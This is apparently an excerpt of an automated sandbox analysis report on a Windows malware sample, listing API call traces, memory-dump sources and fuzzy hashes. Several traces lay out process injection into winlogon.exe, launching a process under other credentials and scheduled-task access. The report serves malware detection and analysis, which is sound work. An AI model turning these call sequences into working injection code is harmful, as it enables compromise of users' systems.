                                                                                                                                                                                                              • memset.MSVCRT ref: 00401963
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000000), ref: 00401988
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 0040199C
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,-00000011), ref: 004019BA
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 004019BD
                                                                                                                                                                                                              • memset.MSVCRT ref: 004019CD
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00401F85,000000FF,00000000,00000000), ref: 004019EF
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000), ref: 00401A03
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000008,00000015), ref: 00401A23
                                                                                                                                                                                                              • HeapAlloc.KERNEL32(00000000), ref: 00401A2A
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401A3A
                                                                                                                                                                                                              • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 00401A57
                                                                                                                                                                                                              • CreateProcessWithLogonW.ADVAPI32(?,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00401A8B
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401A9D
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AA6
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,?), ref: 00401AB2
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AB5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401AC2
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AC5
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00401ACE
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AD1
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AE1
                                                                                                                                                                                                              • HeapValidate.KERNEL32(00000000), ref: 00401AE4
                                                                                                                                                                                                              • GetProcessHeap.KERNEL32(00000000,00401F85), ref: 00401AF1
                                                                                                                                                                                                              • HeapFree.KERNEL32(00000000), ref: 00401AF4
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Heap$Process$ByteCharMultiWide$memset$AllocFreeValidate$CreateLogonWith
                                                                                                                                                                                                              • String ID: D
                                                                                                                                                                                                              • API String ID: 3422789474-2746444292
                                                                                                                                                                                                              • Opcode ID: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction ID: 871197f746f8751ebb4c77b71a3ee3543858eb92964eac2fec8a8f15daba1beb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 5d078a28952d519fbbe26917bfd943a7d615e7a55b6ec330267088c247ed4a0f
                                                                                                                                                                                                              • Instruction Fuzzy Hash: D861D8B1A013157BDB209FA69C48FAB7B6CEF84750F15412AFA18B72D0DA749900CFB4
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00401CF0: memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,774D0F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                                • Part of subcall function 00401CF0: SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                                • Part of subcall function 00401CF0: GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                                • Part of subcall function 00401CF0: CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Sleep.KERNEL32(00000064,00000000,?,75C8DB30,00402F58,winlogon.exe), ref: 0040169D
                                                                                                                                                                                                              • OpenProcess.KERNEL32(001F0FFF,00000000,00000000,00000000,?,75C8DB30,00402F58,winlogon.exe), ref: 004016BC
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 004016DB
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 004016F1
                                                                                                                                                                                                              • GetCurrentProcess.KERNEL32(00000000), ref: 004016FD
                                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00401718
                                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,IsWow64Process), ref: 00401728
                                                                                                                                                                                                              • VirtualAllocEx.KERNEL32(00000000,00000000,?,00003000,00000040), ref: 0040176F
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,00000000,00406400,?,?), ref: 00401791
                                                                                                                                                                                                              • VirtualAlloc.KERNEL32(00000000,?,00003000,00000004), ref: 004017BD
                                                                                                                                                                                                              • memcpy.MSVCRT(00000000,?,?), ref: 004017D8
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,00000000,?), ref: 004017F3
                                                                                                                                                                                                              • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00401801
                                                                                                                                                                                                              • WriteProcessMemory.KERNEL32(00000000,?,00406400,00053200,?), ref: 00401834
                                                                                                                                                                                                              • FlushInstructionCache.KERNEL32(00000000,00000000,00000000), ref: 00401844
                                                                                                                                                                                                              • CreateRemoteThread.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 00401856
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 0040186E
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 0040187F
                                                                                                                                                                                                              • RtlCreateUserThread.NTDLL(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 004018A0
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000), ref: 004018BC
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 004018CD
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: Handle$Process$Create$CloseInformationMemoryThreadVirtualWrite$AddressAllocModuleProcSnapshotToolhelp32$CacheCurrentErrorFlushFreeInstructionLastOpenRemoteSleepSwitchUsermemcpymemset
                                                                                                                                                                                                              • String ID: IsWow64Process$kernel32.dll
                                                                                                                                                                                                              • API String ID: 3542510048-3024904723
                                                                                                                                                                                                              • Opcode ID: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction ID: aea8cd550169bae8ca71061e7f9b66115ece3b9acf575b2a14c75ec5d6601f55
                                                                                                                                                                                                              • Opcode Fuzzy Hash: b52e5c5ec1b8c5c5d1f56604e8b275c58ea21d2f27abb4c54a5c33d97d0ce9a6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1071A4B1A00315ABE7109F94DD89FAF77B8EF88701F158039FA01B72D1D7789A458768
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • memset.MSVCRT ref: 00401D16
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000,774D0F00,00000000,00000000), ref: 00401D27
                                                                                                                                                                                                              • GetLastError.KERNEL32 ref: 00401D30
                                                                                                                                                                                                              • SwitchToThread.KERNEL32 ref: 00401D3F
                                                                                                                                                                                                              • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 00401D48
                                                                                                                                                                                                              • GetHandleInformation.KERNEL32(00000000,00000000), ref: 00401D68
                                                                                                                                                                                                              • CloseHandle.KERNEL32(00000000), ref: 00401D79
                                                                                                                                                                                                              • Module32First.KERNEL32(00000000,?), ref: 00401D9A
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(?,kernel), ref: 00401DBC
                                                                                                                                                                                                              • StrStrIA.SHLWAPI(00000000,.dll), ref: 00401DC8
                                                                                                                                                                                                              • Module32Next.KERNEL32(00000000,00000224), ref: 00401DD6
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CreateHandleModule32SnapshotToolhelp32$CloseErrorFirstInformationLastNextSwitchThreadmemset
                                                                                                                                                                                                              • String ID: .dll$kernel
                                                                                                                                                                                                              • API String ID: 2979424695-2375045364
                                                                                                                                                                                                              • Opcode ID: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction ID: c283e2339ecb9e17340db761c1aee5b765af185a9d94a0bcce3757d144b29585
                                                                                                                                                                                                              • Opcode Fuzzy Hash: cee277edecab6c5d0af180dabfacc852270d041963c786b3d0827f3f906c2871
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8621AB72A012146BD710ABA5AD4CFDF77A89F99321F100276EA14F32E0EA34ED458768
APIs
• GetVersionExA.KERNEL32(?,\\?\globalroot\systemroot\system32\tasks\), ref: 004034E7
• GetCurrentProcess.KERNEL32(00000008,00000000), ref: 00403509
• OpenProcessToken.ADVAPI32(00000000), ref: 00403510
• GetTokenInformation.ADVAPI32(00000000,00000012(TokenIntegrityLevel),?,00000004,?), ref: 00403531
• CloseHandle.KERNEL32(00000000), ref: 00403547
Strings
• \\?\globalroot\systemroot\system32\tasks\, xrefs: 004034C9
Memory Dump Source
• Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
Yara matches
Similarity
• API ID: ProcessToken$CloseCurrentHandleInformationOpenVersion
• String ID: \\?\globalroot\systemroot\system32\tasks\
• API String ID: 4133869067-1576788796
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction ID: 9417f9ed4064ddd1c3f6edb80d8f66b01d291d1ab21ea86703028fde516e46eb
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 53e7ffd853d592cf597099417c9d39be36ad4c569da498972a57c8cd5ff369e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 8E02F530A007459FEB20CF28C6906AFB7F1FF41310F55855AF8A54B391D778A986CBA5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction ID: 0e2bac03be3182a769e9f59211ddb04f7312f67a2832feff6941ae3a6f9bab68
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d05b39787be36e928b4378603e27f9990888dd59e2b3d0c943f83313aa68d1ff
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9002F730A007459FEB24CF18C490AAFB7F1FF41715F14855AE8A68B391D738AE86CB65
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction ID: 647bc1efc872d410d83d31efe28936287375966dcf2aa8afc27d93c91c757f48
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 55b5801493426abadb834ca846d8a52c21ce2827cde252f62827ee7d0c6f5e5b
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 6102F530A017459FEB24CF18C4906AFB7F1FF91711F14855AE8A58B391D338AE96C794
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction ID: 5041421aec073d2b688b2073802020d7c79b1bca3df2cb6ef25812ac66b41e1f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 396aa218b2957ca5b0e965eb8cf056d2cb0237b26e316daf33891388054dd60e
                                                                                                                                                                                                              • Instruction Fuzzy Hash: AA02D430A017459FEB24CF18C590AAFB7F1FF91310F14855AE8A65B3A1D738AD82C7A5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction ID: a657eec15ca3c5bb160301247c07cdb44cfdd935969e5cbf472f05e5335aa939
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a7c18765ffabcd41aad65eb0c58c77c2c909a4c9b1e3ad7c8c9eb5d5d1b42954
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E6F19E71A00619ABDB20CF98C980BAFB7A5EF89314F10417EED05A7382D779DD41CBA5
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction ID: 1bcbb60a4870fb6f7824f06d04ae27aaebc780d04162e94b05afeb65d1883275
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 11c0ee598e7aeb21dc1fcf675ea2201926a005ebd3ef75b4a8992ce9a24da684
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94124A71E002198FCF18CF99C9906AEFBF2FF88314F18916AD859AB754D738A941CB54
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction ID: f2c5ae519af86c61090003759672b7809cd436e53f2fd5b45b2c1165b140046f
                                                                                                                                                                                                              • Opcode Fuzzy Hash: d4ecfbb76b5ff75ca8ce42069abc9beb288d772322e9fc4374153c29d3e72997
                                                                                                                                                                                                              • Instruction Fuzzy Hash: EAE12A309417859FFB25CF28C4906AEBBF1EF52310F1882AFD5E55B392C238A956C758
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction ID: 3d5b5479c895319a2c4470d34a8ff6393b73061c9a225c3785347aa2e70d1fa5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2199f9d5ef3831119798c1dc9bd5d1b85a9c125d43dbf3cc54136715279e40c
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0DE10330E045458FDB08CF68C9806ADBBF3EF89310B28C1AED495DB346D639EA46CB55
Memory Dump Source
• Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction ID: 8b1a689c82d0fe3ee89c344c2f7eab184c0c6edd59e3ba46ea3345da4373e9f6
                                                                                                                                                                                                              • Opcode Fuzzy Hash: e4f8c752663e60b2715eb80ca10e498db60ca875b2efaa2d9ab2dd7c96a0f916
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 1ED13576E0021A8FCB18CF99C9815AEFBB2FF98310F25956AD815BB704D734A911CF94
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction ID: 661d4224e0226a62dc5565bcde94e6aa946e1ef99945e038f73d7b47cfba27f7
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 1fa79efd77040c91d97ccb62c7c4d6b3fc1a67cf8e84a75a06133681ecf7a348
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F7917371D01215AFDB50EFA5C840B9EB7B5AF88304F26847EE805B7381D738AD11CBA8
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                              • Instruction ID: e1d19a3f0243f14b79b01c451a6d6cb00abb7833888d4a0596576d76429fa551
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 30296fb46389e41053c9c1891a2e91179b26c183d1817db7ada92d60d53047d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4E81C5319893918BC795DF38C8D65D6BBB1EE4322432E85DDC8940EA03E22F651BDF51
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction ID: 91c87d25872e839baae7933b1d26ceab25bf760725ff438016367df0c9695c0c
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 3090cd04c4ac406685f1ab0f7046645eb9a7970325283ab6b837acbd2454e769
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 9E51B333F215214BE348EA7ACC8415A73D3EBCA31075AC63AD901DB395E974E96396C4
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction ID: f12356c3dda02b0944d66f82227427b0d7e0263a6395cb29892584ed5db79ad8
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7928e8e2b48241c328333a21e1eda0a8dfd2b13abab1239be22144118d9f0051
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 19517C7190D3918BD311CF2AC48066BBBE1AFD9314F044E6EF8C4A7352D7798A458B96
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction ID: 448e8c8128ee218613f355b6a59d53b40018dab5e4ac80cca173ede8df55363b
                                                                                                                                                                                                              • Opcode Fuzzy Hash: a2b513c737e90aa001c187f0fd3e76af3dd05bb8b1f1583072d2ffb077b327e0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 4141C277E51A3947F3188949CD81744AA52ABCC324F2B83B5CD2C6B356D8B9ED039AD0
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000001.00000002.1314203678.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000001.00000002.1314203678.000000000045E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_1_2_400000_Z8eHwAvqAh.jbxd
                                                                                                                                                                                                              Yara matches
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID:
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID:
                                                                                                                                                                                                              • Opcode ID: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
                                                                                                                                                                                                              • Instruction ID: 081832729734f64ca8943200ec232ae7a260b1d72c680c68a8391be1ada1e6fc
                                                                                                                                                                                                              • Opcode Fuzzy Hash: c32c7c64c535abbb448f0f017838c40942559ebacb89743a81205ea225361776
